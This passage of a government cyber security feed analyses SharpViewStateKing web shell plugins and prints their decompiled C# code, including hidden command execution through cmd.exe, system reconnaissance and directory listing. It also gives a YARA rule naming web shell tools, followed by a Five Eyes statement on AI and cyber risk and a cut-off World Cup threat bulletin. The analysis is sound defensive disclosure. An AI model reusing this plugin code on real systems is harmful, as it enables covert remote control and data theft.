(UnicastIPAddressInformation item in unicastAddresses) { if (item.Address.AddressFamily != AddressFamily.InterNetwork) { if (item.Address.AddressFamily == AddressFamily.InterNetworkV6) { text3 = string.Concat(text3, item.Address, ","); } } else { text2 = string.Concat(text2, item.Address, ","); } } string text4 = string.Empty; if (iPProperties.DnsAddresses.Any()) { Console.WriteLine("DNS Servers:"); foreach (IPAddress dnsAddress in iPProperties.DnsAddresses) { text4 = string.Concat(text4, dnsAddress, ","); } } text += $"Network adapter: {networkInterface.Description}\r\n"; text += $" MAC address: {networkInterface.GetPhysicalAddress().ToString()}\r\n"; text += $" IP addresses: {text2.Trim() + text3.Trim().Trim(new char[1] { ‘,’ })}\r\n"; text += $" DNS Server: {text4}\r\n"; } text += "\r\n->||"; Process[] processes = Process.GetProcesses(); foreach (Process process in processes) { text = text + process.ProcessName + ".exe,"; } return text + "||<-"; } } </code> </pre> </div> <details><summary>Figure 9 long descriptionĀ – GetSystemInformation method in Information class</summary><p>The figure contains a public static method GetSystemInformation that builds a detailed string of system data. It queries current web directories, reads Windows product and version from the registry, enumerates drives to report disk sizes and free space, and iterates network interfaces to collect IP addresses while skipping the loopback adapter.</p> </details><div class="clearfix">Ā </div> <h3>Observation 5</h3> <p><strong>Main capability:</strong> ListDirectory</p> <p><strong>Observed technique:</strong> ListDirectory (<a href="https://attack.mitre.org/techniques/T1083/">T1083</a>)</p> <p>This plugin implemented a class that enabled the threat actor to enumerate and retrieve detailed information on files and directories on the victimās filesystem using the following two methods:</p> <ol><li><strong>list_directory(string path):</strong> listed all files and folders in a specified directory <ul><li>used <strong><code>DirectoryInfo</code></strong> to access the target directory and <strong><code>GetFileSystemInfos()</code></strong> to retrieve all files and subdirectories</li> <li>for each file or folder item, it called <strong><code>GetIcon()</code></strong> to retrieve the visual icon and create a <strong><code>MemoryStream</code></strong> (temporary memory buffer) to hold image data and save the icon as a PNG image into the <strong><code>MemoryStream</code></strong></li> <li>checked if the item was a directory or a file using <strong><code>FileAttributes</code></strong>, and any file size was retrieved in bytes</li> <li>built a tab-separated string containing: <ul><li>file name</li> <li>full path</li> <li>IsDirectory flag (true/false)</li> <li>icon data encoded as Base64</li> <li>last modified timestamp (format: yyyy-mm-dd hh:mm:ss)</li> <li>file size (0 for directories)</li> </ul></li> </ul></li> </ol><div class="clearfix">Ā </div> <h4 class="text-center">Figure 10: list_directory method in ListDirectory</h4> <div class="container"> <pre> <code> public class ListDirectory { public static string list_directory(string path) { StringBuilder stringBuilder = new StringBuilder(); try { DirectoryInfo directoryInfo = new DirectoryInfo(path); FileSystemInfo[] fileSystemInfos = directoryInfo.GetFileSystemInfos(); FileSystemInfo[] array = fileSystemInfos; foreach (FileSystemInfo fileSystemInfo in array) { MemoryStream memoryStream = new MemoryStream(); string text = "0"; bool flag = true; ((Image)GetIcon(fileSystemInfo.FullName)).Save((Stream)memoryStream, ImageFormat.Png); if ((fileSystemInfo.Attributes & FileAttributes.Directory) != FileAttributes.Directory) { flag = false; text = new FileInfo(fileSystemInfo.FullName).Length.ToString(); } stringBuilder.Append(string.Format("{0}\t{1}\t{2}\t{3}\t{4}\t{5}\r\n", fileSystemInfo.Name, fileSystemInfo.FullName, flag, Convert.ToBase64String(memoryStream.ToArray()), File.GetLastWriteTime(fileSystemInfo.FullName).ToString("yyyy-MM-dd hh:mm:ss"), text)); memoryStream.Close(); } } catch (Exception ex) { stringBuilder.Append(ex.Message); } return stringBuilder.ToString(); } } </code> </pre> </div> <details><summary>Figure 10 long descriptionĀ – list_directory method in ListDirectory</summary><p>The figure shows a C# class named ListDirectory with a public static method list_directory that takes a path and returns a formatted string of directory contents. It iterates through FileSystemInfo entries, saves each itemās shell icon to a MemoryStream as PNG (then Base64), determines whether the entry is a directory or file and, for files, captures the size.</p> </details><div class="clearfix">Ā </div> <ol start="2"><li><strong>GetIcon(string file):</strong>extracted visual icons or thumbnails from files to help identify file types <ul><li>image file types (e.g., .jpg, .jpeg, .gif, .png, .bmp) were opened to create a 48×48 pixel thumbnail</li> <li>all other file types extracted the associated Windows shell icon, converted it to a bitmap graphic, and returned the icon to the threat actor as a bitmap object</li> </ul></li> </ol><div class="clearfix">Ā </div> <h4 class="text-center">Figure 11: GetIcon method in ListDirectory class</h4> <div class="container"> <pre> <code> public class ListDirectory { private static Bitmap GetIcon(string file) { try { if (file.EndsWith("jpg") || file.EndsWith("jpeg") || file.EndsWith("gif") || file.EndsWith("png") || file.EndsWith("bmp")) { Bitmap val = new Bitmap(file); return new Bitmap(((Image)val).GetThumbnailImage(48, 48, (GetThumbnailImageAbort)(() => false), IntPtr.Zero)); } Icon val2 = Icon.ExtractAssociatedIcon(file); return val2.ToBitmap(); } catch { return new Bitmap(48, 48); } } } </code> </pre> </div> <details><summary>Figure 11 long descriptionĀ – GetIcon method in ListDirectory class</summary><p>The figure contains a C# snippet from a class named ListDirectory defining a private static method GetIcon that returns a Bitmap for a given file path. Inside a try block, it checks if the file has an image extension (jpg, jpeg, gif, png, bmp); for images it creates a 48×48 thumbnail from the bitmap, and for other files it extracts the system-associated icon using Icon.ExtractAssociatedIcon and converts it to a bitmap. If any error occurs, the method falls back to returning a new 48×48 bitmap as a default.</p> </details><div class="clearfix">Ā </div> <h3>Observation 6</h3> <p><strong>Main capability:</strong> RemoteExec</p> <p><strong>Observed technique:</strong> RemoteExec (<a href="https://attack.mitre.org/techniques/T1059/003/">T1059.003</a>)</p> <p>This plugin implemented a class that enabled the threat actor to remotely execute a command or existing executable on the compromised host and return its output by:</p> <ul><li>taking the target command as an argument</li> <li>decoding the following hard-coded Base64 string: <strong><code>QzpcV2luZG93c1xTeXN0ZW0zMlxjbWQuZXhl</code></strong> into <strong><code>C:\Windows\System32\cmd.exe</code></strong>.</li> <li>launching the above <strong><code>cmd.exe</code></strong> process as a hidden window, writing the supplied command plus "<strong><code>&exit</code></strong>" to <strong><code>StandardInput</code></strong>, then extracting both the <strong><code>StandardOutput</code></strong> and <strong><code>StandardError</code></strong></li> </ul><p>The result is returned via <abbr title="hypertext transfer protocol">HTTP</abbr> response by the constructor.</p> <div class="clearfix">Ā </div> <h4 class="text-center">Figure 12: ExecCmd method in RemoteExec class</h4> <div class="container"> <pre> <code> public class RemoteExec { public static string ExecCMD(string command) { string empty = string.Empty; string fileName = Encoding.UTF8.GetString(Convert.FromBase64String("QzpcV2luZG93c1xTeXN0ZW0zMlxjbWQuZXhl")); string text = command + "&exit"; try { ProcessStartInfo processStartInfo = new ProcessStartInfo(); processStartInfo.FileName = fileName; processStartInfo.RedirectStandardInput = true; processStartInfo.RedirectStandardOutput = true; processStartInfo.RedirectStandardError = true; processStartInfo.UseShellExecute = false; processStartInfo.CreateNoWindow = true; Process process = new Process(); process.StartInfo = processStartInfo; process.Start(); process.StandardInput.WriteLine(text); empty = process.StandardOutput.ReadToEnd(); empty = empty.Substring(empty.IndexOf(text) + text.Length); empty += process.StandardError.ReadToEnd(); process.WaitForExit(); process.Close(); } catch (Exception ex) { empty = $"\r\n[!] ExecCMD error: {ex.Message}"; } return empty; } } </code> </pre> </div> <details><summary>Figure 12 long descriptionĀ – ExecCmd method in RemoteExec class</summary><p>The figure shows a C# class named RemoteExec with a public static method ExecCMD that runs a shell command and returns its output. It decodes a base64 string to obtain the executable name, builds a ProcessStartInfo with standard input/output/error redirected, writes the command followed by ā&exit,ā then reads both stdout and stderr before waiting for the process to finish. If an exception occurs, the method returns a formatted error message containing the exception text.</p> </details><div class="clearfix">Ā </div> <!–** TOP OF PAGE ******–> <div class="clearfix">Ā </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a>Ā <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <h2 class="text-info" id="5">Indicators of compromise and recommendations</h2> <p>Indicators of compromise (IoCs) were distributed through alerts and communications by the Canadian Cyber Security Incident Response Team (CSIRT). This ensured that partners across all sectors had the information they needed to act decisively.</p> <p>Due to the capabilities demonstrated by the implant framework, a full rebuild of all infected hosts is strongly recommended. Encryption and validation keys in the ASP.NET web application should be treated as compromised and replaced, following Microsoftās <a href="https://www.microsoft.com/en-us/msrc/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/">Customer guidance for SharePoint vulnerability CVE-2025-53770</a>. Network detection and response (NDR) and endpoint detection and response (EDR) telemetry should be examined for evidence of lateral movement to other network hosts by checking for:</p> <ul><li>newly created user accounts</li> <li>recently installed software (e.g., SoftEther <abbr title="virtual private network">VPN</abbr>)</li> <li>any modifications to settings like Microsoft Defender Antivirus exclusions.</li> </ul><p>Additionally, all passwords and credentials on the victimās system should be considered compromised and, therefore, rotated.</p> <p>For up-to-date information on <a href="/en/alerts-advisories">alerts and advisories</a> or <a href="/en/guidance">cyber security guidance</a>, please <a href="/en/contact-cyber-centre">contact the Cyber Centre</a>.</p> <h2 class="text-info" id="6">Cyber Centre tools and services</h2> <p>No single tool, service or turnkey solution can reconstruct an incident, trace a threat actorās path or validate a threat on its own. A holistic approach using multiple perspectives is required to conduct a thorough investigation. As such, the Cyber Centre relies on multiple layered telemetry sources to detect threats and protect monitored assets.</p> <p><a href="/en/tools-services/assemblyline">Assemblyline</a> was used to enable triage at scale, processing hundreds of thousands of files per day by leveraging over 75 anti-virus products and checking hashes against a local cache of VirusTotal results. In this incident, all 67 unique malware samples retrieved did not result in a single detection.</p> <p>In response to this incident, the Cyber Centre created YARA rules that target C# code rather than compiled DLLs, resulting in more flexible detection rules. Additional YARA rules will be released periodically after an evaluation period to ensure accuracy.</p> <p>The sample YARA rule below implements detections for several of the observed malware.</p> <div class="clearfix">Ā </div> <h4 class="text-center">Figure 13: YARA rule for observed malware</h4> <div class="container"> <pre> <code> rule SharpViewStateKing { meta: id = "6gLZaiLFk2mV4fWlj0eIQ2" fingerprint = "00b4dfca3c9c883088259ec9b125411e0896be54cfe08201b03f36d51ae05c8b" version = "1.0" date = "2026-05-01" modified = "2026-05-01" status = "RELEASED" sharing = "TLP:CLEAR" source = "CCCS" author = "reveng@CCCS" description = "Detects SharpViewStateKing webshell." category = "MALWARE" malware = "SHARPVIEWSTATEKING" malware_type = "WEBSHELL" mitre_att = "T1505.003" hash = "547b65933c4b6af8a240cca21175398775abe228eceea2c4138b262ed0a90967" hash = "24c600584c3d36cfc02c8dbc528306fe8b69971045b299de8186954e0eed0f3e" hash = "8d7713e2687dd2e9311e3a3f5df85ecc20dbf4c4b0c91086e0c53bd2c112bde1" hash = "a6d7461a88cf7f12072b812499fee3ac6d08acff4db611623871765b60cf1014" hash = "921f6502b79b542b2123ba05f86ccfe44746a5feeefc92d7cf5506f04c47b58a" hash = "6c249e9a4a55b18a0d17e9430666ccbf61b2fe6349e18e830c4f55ae47fc87d5" hash = "1f258c70dfb064e6e1a55885b22660aa034469699be7e0ffeb5d174c8afa72c8" hash = "d2f2f0941fe3cb70ba4aeb0927d1a8abcf556d4150832962eb3cc6c13d6c7256" strings: $web_1 = "&__SCROLLPATH=" wide $web_2 = "/wEPDwUKLTcyODc4" wide $web_3 = "__VIEWSTATE={0}&__VIEWSTATEGENERATOR={1}" wide $web_4 = "DecodeViewState" $web_5 = "CraeteViewState" $web_6 = "WebForms_HiddenFieldPageStatePersister_ClientState" $web_7 = "ViewStateUserKey" wide nocase $web_8 = "__VIEWSTATEENCRYPTED" wide $web_9 = "__VIEWSTATE" wide $web_10 = "&__SCROLLPOSITION=" wide $web_11 = "<input type=\"hidden\" name=\"" wide $web_12 = "<input type=\"\"hidden\"\" name=\"\"__VIEWSTATE\"\" id=\"\"__VIEWSTATE\"\" value=\"\"/wEPDwUKLTcyODc4\"" $web_13 = "&__VIEWSTATEGENERATOR=" wide $web_14 = "FriendlyUrlsViewSwitcherRoute" $web_15 = "System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(" $str_plugin_1 = "antsword" $str_plugin_2 = "godzilla" $str_plugin_3 = "ghostwebshell" $str_payload_dotnet_serialized = ": \"/wEyo" $str_name_1 = "SharpViewStateKing" ascii wide $str_name_2 = "ViewStateKing" ascii wide $str_name_3 = "ViewStateLibrary" $str_enc = "EncryptOrDecryptData" $str_key = "3c6e0b8a9c15224a" $str_enc_func = "public static byte[] Enc(byte[] data)" $str_dec_func = "public static byte[] Dec(byte[] data)" $str_sys_info = "SELECT * FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = ‘TRUE’" $str_dll = "a4hmgwwu.dll" $str_bypass = "[!] Bypass error: {0}" wide condition: 2 of ($web_*) and 2 of ($str_*) } </code> </pre> </div> <details><summary>Figure 13 long descriptionĀ – YARA rule for observed malware</summary><p>This YARA rule detects the SharpViewStateKing ASP.NET web shell, which abuses the ViewState mechanism and base64-encoded page state to execute commands, including references to known web shell tooling and .NET methods for encoding/decoding and custom encryption/decryption. It is intended for scanning ASP.NET pages and .NET assemblies where hidden input fields and serialized payloads may be present; false positives should be rare but can occur in heavily customized applications that manipulate ViewState in nonstandard ways.</p> </details><div class="clearfix">Ā </div> <!–** TOP OF PAGE ******–> <div class="clearfix">Ā </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a>Ā <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <h2 class="text-info" id="7">Acknowledgments</h2> <p>As a part of the Communications Security Establishment Canada (CSE), the Cyber Centre is a proud member of the Five Eyes, the worldās longest-standing and closest intelligence-sharing alliance. Sharing <abbr title="indicators of compromise">IoCs</abbr> and TTPs with the cyber community and Five Eyes partners has been instrumental since SharpViewStateKing plugins were first discovered, and ongoing analytical exchanges have maximized the value of collected data.</p> <section class="alert alert-info"><p><strong>Disclaimer: </strong>The Cyber Centre disclaims all liability for any loss, damage, or costs arising from the use of or reliance on the information within this article. Readers are solely responsible for verifying the accuracy and applicability of any information before acting on it.</p> </section><!–FOOTNOTE SECTION EN–><aside class="wb-fnote" role="note"><h2 class="text-info" id="8">References</h2> <dl><dt>Footnote 1</dt> <dd id="fn1"> <p>The Cyber Centre is aware of an open-source project of the same name previously available on <a href="https://github.com/RowTeam/SharpViewStateKing">GitHub</a> until 2023 when it became private.</p> <p class="fn-rtn"><a href="#fn1-rf"><span class="wb-inv">Return to footnote</span>1<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 2</dt> <dd id="fn2"> <p><a href="https://www.microsoft.com/en-us/security/blog/2025/02/06/code-injection-attacks-using-publicly-disclosed-asp-net-machine-keys/">Code injection attacks using publicly disclosed ASP.NET machine keys</a></p> <p class="fn-rtn"><a href="#fn2-rf"><span class="wb-inv">Return to footnote</span>2<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 3</dt> <dd id="fn3"> <p><a href="https://github.com/fortra/impacket/blob/master/examples/secretsdump.py">Impacket secretsdump.py</a></p> <p class="fn-rtn"><a href="#fn3-rf"><span class="wb-inv">Return to footnote</span>3<span class="wb-inv"> referrer</span></a></p> </dd> </dl></aside></div> </div> </div> </div> </div> </article>
- Obsolete products – ITSAP.00.095by Canadian Centre for Cyber Security on July 7, 2026 at 7:17 pm
Although obsolete products may still meet functional requirements, their continued use can introduce security and operational risks that are not always obvious. This publication provides guidance to help your organization identify obsolete products, manage associated risks and transition safely to supported alternatives.
- Statement from the Canadian Centre for Cyber Security on frontier artificial intelligence models and their impact on cyber securityby Canadian Centre for Cyber Security on June 24, 2026 at 5:24 pm
<article data-history-node-id="7908" about="/en/news-events/statement-canadian-centre-cyber-security-frontier-artificial-intelligence-models-their-impact-cyber-security" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> </div> </div> </div> </article>
- Five Eyes cyber security agencies statement on the AI shift in cyber risk: why leaders must act nowby Canadian Centre for Cyber Security on June 22, 2026 at 1:01 pm
<article data-history-node-id="7773" about="/en/news-events/five-eyes-cyber-security-agencies-statement-ai-shift-cyber-risk-why-leaders-must-act-now" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><div class="pull-right mrgn-lft-lg col-md-6 col-sm-6 col-xs-12"> <figure><img alt="" class="img-responsive mrgn-bttm-sm center-block" src="/sites/default/files/images/five-eyes-logo-collectivite-cinq-460×76.png" /><figcaption class="h2 mrgn-tp-0 mrgn-bttm-lg text-center">Five Eyes</figcaption></figure></div> <p>As the leaders of the Five Eyes cyber security agencies, we are united in our call to action: the evolving landscape of artificial intelligence (AI) is rapidly transforming cyber risk, and we must act swiftly to remain ahead.</p> <h2>A call to action</h2> <p>While <abbr title="artificial intelligence">AI</abbr> will help us improve cyber defence over time, it also accelerates the speed, scale, and sophistication of cyber threats.</p> <p>Frontier <abbr title="artificial intelligence">AI</abbr> models are anticipated to exceed current industry expectations, fundamentally transforming both offensive and defensive cyber capabilities. The timeline is not years, it is months.</p> <p>In this environment, cyber resilience is integral to advancing business continuity, market confidence, and long-term value. We urge leaders to:</p> <ul><li>understand and assess risk, readiness and accountability</li> <li>prioritize foundational cyber security practices and controls</li> <li>empower cyber leaders with authority and resources</li> <li>stay actively engaged as threats and guidance evolve</li> </ul><p>Success will come from getting the basics right, acting quickly, and integrating cyber security into core business strategy. Those that do not will face growing operational and strategic disadvantage.</p> <h2>The urgency is clear</h2> <p><abbr title="artificial intelligence">AI</abbr> is not a future considerationĀ ā it is already here.</p> <p>It lowers barriers for malicious actors and increases the speed and complexity of attacks, shrinking the window between vulnerability discovery and exploitation ever more quickly. At the same time, <abbr title="artificial intelligence">AI</abbr> offers powerful tools to strengthen defence.</p> <h2>A whole-of-organization and whole-of-society response is required</h2> <p>Cyber risk can no longer be treated as a purely technical issue. This is a core business risk and leadership responsibility. Boards and executives should ensure cyber resilience is in place and works under pressure. It is not enough to have controls. Leaders must be confident those controls will perform during a real incident. This requires reassessing long-standing trade-offs and using <abbr title="artificial intelligence">AI</abbr> deliberately to strengthen defenceĀ ā not just improve efficiency.</p> <h2>Key actions for leaders</h2> <p>Core principles:</p> <ul><li>Secure-by-design and secure-by-default must become standard practiceĀ ā not an aspiration</li> <li>Resilience cannot depend on a single solution or technology. Defence in depth remains essential</li> <li>As <abbr title="artificial intelligence">AI</abbr> systems evolve, new and previously unknown vulnerabilities will emerge, including zeroāday vulnerabilities</li> </ul><p>Breaches will occur. Preparedness helps you contain them quickly and prevent escalation into major operational and financial crises.</p> <h3>Practical actions</h3> <p>These actions are not new, but are now urgent to reduce not only technical risk, but also operational, financial and reputational exposure:</p> <ol><li><strong>Reduce your attack surface: </strong>Limit unnecessary system access and external connectivity. Challenge whether systems need to be exposed at all and isolate those that do not</li> <li><strong>Accelerate patching processes: </strong><abbr title="artificial intelligence">AI</abbr> is shortening the time between vulnerability discovery and exploitation. Delays in patching increase risk, especially for operational systems with long update cycles. Prioritise security updates accordingly to manage risks</li> <li><strong>Address legacy systems</strong>: Unsupported systems are easy targets. They are not just technical debt, they are strategic liabilities</li> <li><strong>Review and strengthen identity and access controls: </strong>Limit who can access critical systems. Enforce strong authentication and regularly review permissions</li> <li><strong>Prepare for incidents before they happen: </strong>Test response plans, train and prepare teams, and assume breaches will occur. Focus on fast containment and recovery</li> </ol><h2>Use <abbr title="artificial intelligence">AI</abbr> to strengthen defence</h2> <p>Adversaries are already using <abbr title="artificial intelligence">AI</abbr> to move faster and more effectively. Defenders must do the same.</p> <p>Organizations that integrate <abbr title="artificial intelligence">AI</abbr> tools into their security operations can detect vulnerabilities earlier, improve software quality, monitor unusual behaviour, and respond faster to incidentsĀ ā reducing both the cost and impact of incidents.</p> <p>Success will not come from having the most tools. It will come from getting the basics right, acting quickly, and integrating cyber security into core business strategy.</p> <h2>We must act now</h2> <p>The rapid pace of frontier <abbr title="artificial intelligence">AI</abbr> development means cyber risk assumptions can become outdated in months, not years. We must act before and be prepared to adapt and withstand evolving threats.</p> <p>Cyber resilience is not an <abbr title="information technology">IT</abbr> issueĀ – it is central to operational continuity and market trust. Leaders who act now will reduce exposure, strengthen resilience, and build confidence with customers, partners, and investors. Those who delay will face growing and avoidable risk.</p> <div class="well mrgn-tp-lg mrgn-bttm-lg"> <p class="mrgn-bttm-sm">Our Five Eyes cyber security partnership is deep and transparent. The way we share cyber threat information is critical to our collective security. In that spirit, we call on leaders across industryĀ ā including vendorsĀ ā to act now and work together to protect our people and secure our future.</p> </div> <div class="row"> <div class="col-md-4 col-sm-4"><img alt="" class="img-responsive mrgn-bttm-md col-md-8 col-md-offset-2 col-sm-12 col-sm-offset-0 col-xs-8 col-xs-offset-2" src="/sites/default/files/images/stephanie-crowe-420×420.jpg" /><p class="col-md-12 col-xs-12">Stephanie Crowe, Head Australian Cyber Security Centre (Australian Signals Directorate)</p> </div> <div class="col-md-4 col-sm-4"><img alt="" class="img-responsive mrgn-bttm-md col-md-8 col-md-offset-2 col-sm-12 col-sm-offset-0 col-xs-8 col-xs-offset-2" src="/sites/default/files/images/rajiv-gupta-420×420.jpg" /><p class="col-md-12 col-xs-12">Rajiv Gupta, Head Canadian Centre for Cyber Security (Communications Security Establishment Canada)</p> </div> <div class="col-md-4 col-sm-4"><img alt="" class="img-responsive mrgn-bttm-md col-md-8 col-md-offset-2 col-sm-12 col-sm-offset-0 col-xs-8 col-xs-offset-2" src="/sites/default/files/images/catriona-robinson-420×420.jpg" /><p class="col-md-12 col-xs-12">Catriona Robinson, Head of the National Cyber Security Centre (Government Communications Security Bureau)</p> </div> </div> <div class="row"> <div class="col-md-4 col-sm-4"><img alt="" class="img-responsive mrgn-bttm-md col-md-8 col-md-offset-2 col-sm-12 col-sm-offset-0 col-xs-8 col-xs-offset-2" src="/sites/default/files/images/richard-horne-420×420.jpg" /><p class="col-md-12 col-xs-12">Richard Horne, Chief Executive Officer National Cyber Security Centre (Government Communications Headquarters)</p> </div> <div class="col-md-4 col-sm-4"><img alt="" class="img-responsive mrgn-bttm-md col-md-8 col-md-offset-2 col-sm-12 col-sm-offset-0 col-xs-8 col-xs-offset-2" src="/sites/default/files/images/david-imbordino-420×420.jpg" /><p class="col-md-12 col-xs-12">David Imbordino, Director Cyber Security Directorate (National Security Agency)</p> </div> <div class="col-md-4 col-sm-4"><img alt="" class="img-responsive mrgn-bttm-md col-md-8 col-md-offset-2 col-sm-12 col-sm-offset-0 col-xs-8 col-xs-offset-2" src="/sites/default/files/images/nick-anderson-420×420.jpg" /><p class="col-md-12 col-xs-12">Nick Andersen, Acting Director (Cybersecurity and Infrastructure Security Agency)</p> </div> </div> </div> </div> </div> </div> </div> </article>
- Cyber threat bulletin: FIFA World Cup 2026ā¢by Canadian Centre for Cyber Security on June 3, 2026 at 5:26 pm
<article data-history-node-id="7762" about="/en/guidance/cyber-threat-bulletin-fifa-world-cup-2026tm" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><section><h2 class="text-info page-header">Overview</h2> <p>The Cyber Centre assesses that the FIFA World Cup 2026<sup>TM</sup> will almost certainly be targeted by a range of cyber threat actors, including cybercriminals, non-state actors, and state-sponsored actors. The tournament will run from June 11 to July 19, 2026, and will include 104 matches with 48 teams across 16 cities in Canada, the United States, and Mexico.<sup id="fn1-rf"><a class="fn-lnk" href="#fn1"><span class="wb-inv">Footnote </span>1</a></sup> Due to its unique blend of global visibility, complex supporting infrastructure, and symbolic importance, the FIFA World Cup 2026<sup>TM</sup> is a high-profile target for cyber threat activity. The tournamentās broad attack surfaceĀ ā including physical and digital systems, surrounding business ecosystem, and supply chain partnersĀ ā provides many opportunities for cyber threat actors to advance their ideological, geopolitical, and financial objectives.</p> <details class="mrgn-tp-md"><summary><h2 class="h3">Table of contents</h2> </summary><ul class="list-unstyled"><li><a href="#key-judgments">Key judgments</a></li> <li><a href="#threat-individuals">Cyber threats to individuals</a></li> <li><a href="#threats-org-businesses-gc">Cyber threats to organizations, businesses, and governments</a></li> <li><a href="#disinformation-activity">Disinformation and influence activity</a></li> <li><a href="#outlook">Outlook</a></li> <li><a href="#about">About this document</a></li> <li><a href="#resources">Useful resources</a></li> <li><a href="#endnotes">End notes</a></li> </ul></details></section><div class="clearfix">Ā </div> <section><h2 class="text-info page-header lst-spcd" id="key-judgments">Key judgments</h2> <ul><li>We assess that cybercriminals will almost certainly exploit the public engagement and the popularity of the FIFA World Cup 2026<sup>TM</sup> to support financially motivated cyber threat activity against individuals and organizations. Cybercriminals use major events like the FIFA World Cup 2026<sup>TM</sup> as topical lures and pretexts for phishing campaigns and social engineering attacks. They target both individuals and organizations to steal credentials, commit financial fraud, and exploit data. Cybercriminals will very likely attempt to extort organizations associated with or supporting the event through disruptive attacks, including ransomware.</li> <li>We assess that ideologically motivated non-state cyber threat actors, commonly referred to as hacktivists, will very likely engage in disruptive cyber attacks against organizations associated with the FIFA World Cup 2026<sup>TM</sup>, including distributed denial-of-service (DDoS) attacks and defacement attacks against websites and other digital services to draw attention to domestic issues within host countries, environmental causes, or international conflict.</li> <li>We assess that there is a roughly even chance that state-sponsored cyber threat actors will conduct disruptive cyber threat activity against the FIFA World Cup 2026<sup>TM</sup> as a strategic tool in broader geopolitical confrontations. Our assessment of the likelihood of this activity may change based on the development of ongoing conflicts and geopolitical tensions involving host nations and participating countries.</li> <li>We assess that cyber threat actors will very likely leverage the public interest and media coverage of the FIFA World Cup 2026<sup>TM</sup> to spread disinformation and narratives supporting their strategic interests, including through campaigns that leverage AI-generated content and deepfakes.</li> </ul><div class="clearfix">Ā </div> <h2 class="text-info page-header" id="threat-individuals">Cyber threats to individuals</h2> <p>We assess that cybercriminals almost certainly present the primary cyber threat to patrons and spectators of the FIFA World Cup 2026<sup>TM</sup> via event-themed financial fraud and scams. Cybercriminals use events like the FIFA World Cup 2026<sup>TM</sup> as topical lures and pretexts for phishing campaigns and social engineering attacks. They target both individuals and organizations to steal credentials, commit financial fraud, and exploit data. Individuals who fall victim to cyber-enabled fraud and scams may suffer financial loss or have their personal information exposed, which can lead to further identity theft and other fraudulent activity.</p> <p>Cybercriminals use event-related lures, such as travel discounts, exclusive livestreaming access, sports betting opportunities, or fraudulent offers for tickets, merchandise, or short-term rentals to entice victims to engage with phishing messages and malicious advertisements, websites, or event-related mobile applications.<sup id="fn2-rf"><a class="fn-lnk" href="#fn2"><span class="wb-inv">Footnote </span>2</a></sup> For example, security researchers at a private cybersecurity firm reported that phishing attempts against victims in the Middle East and North Africa doubled ahead of the 2022 FIFA World Cup, with cybercriminals impersonating athletes and FIFA ticket offices.<sup id="fn3-rf"><a class="fn-lnk" href="#fn3"><span class="wb-inv">Footnote </span>3</a></sup> As of August 2025, another cybersecurity firm identified over 4300 likely fraudulent domain registrations related to the FIFA World Cup 2026<sup>TM</sup>, many strategically combining host city names with tournament years (e.g. āfifawcdallas.comā) and other key words like āfootballā or āFIFAā.<sup id="fn4-rf"><a class="fn-lnk" href="#fn4"><span class="wb-inv">Footnote </span>4</a></sup> Many of these websites attempt to replicate FIFAās branding, logos, and designs. The impact of these campaigns can be amplified when cybercriminals impersonate well-known entities including athletes, team affiliates, official organizers and sponsors, or local authorities. For example, cybercriminals have repeatedly exploited the likeness of Cristiano Ronaldo, a popular professional footballer, in numerous scams tied to sporting events. Using artificial intelligence (AI), cybercriminals have created deepfake videos that convincingly impersonated the athlete to promote fraudulent financial schemes on social media.<sup id="fn5-rf"><a class="fn-lnk" href="#fn5"><span class="wb-inv">Footnote </span>5</a></sup></p> <section class="panel panel-primary"><header class="panel-heading"><h3 class="panel-title">The threat from short message service (SMS) blasters</h3> </header><div class="panel-body"> <p>SMS blasters are portable devices that can be used to send mass amounts of āsmishingā messages to nearby cellphones. These messages can contain malicious links that are used to harvest credentials, personal information, or financial details from victims.<sup id="fn6-rf"><a class="fn-lnk" href="#fn6"><span class="wb-inv">Footnote </span>6</a></sup></p> <p>In April 2026, arrests were made following the discovery of an SMS blaster used within the Greater Toronto Area over the course of several months.<sup id="fn7-rf"><a class="fn-lnk" href="#fn7"><span class="wb-inv">Footnote </span>7</a></sup> It is estimated that tens of thousands of devices connected to the blaster, with over 13 million network disruptions. Similar reports of SMS blaster scams have emerged from many countries including the United Kingdom, New Zealand, Vietnam, Thailand, and Greece.<sup id="fn8-rf"><a class="fn-lnk" href="#fn8"><span class="wb-inv">Footnote </span>8</a></sup></p> <p>An SMS blaster deployed around an event like the FIFA World Cup 2026<sup>TM</sup> would allow threat actors to send out massive volumes of smishing messages to patrons. These messages may appear as coming from legitimate sources like event organizers, rideshare providers, or local authorities and could be used to maximize the reach of fraud campaigns. Because SMS blasters act as a rogue cellular tower, nearby phones may also temporarily lose their connection to legitimate networks, potentially limiting access to emergency services, such as 911, for periods ranging from a few seconds to several minutes.</p> </div> </section><div class="clearfix">Ā </div> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div class="clearfix">Ā </div> <h2 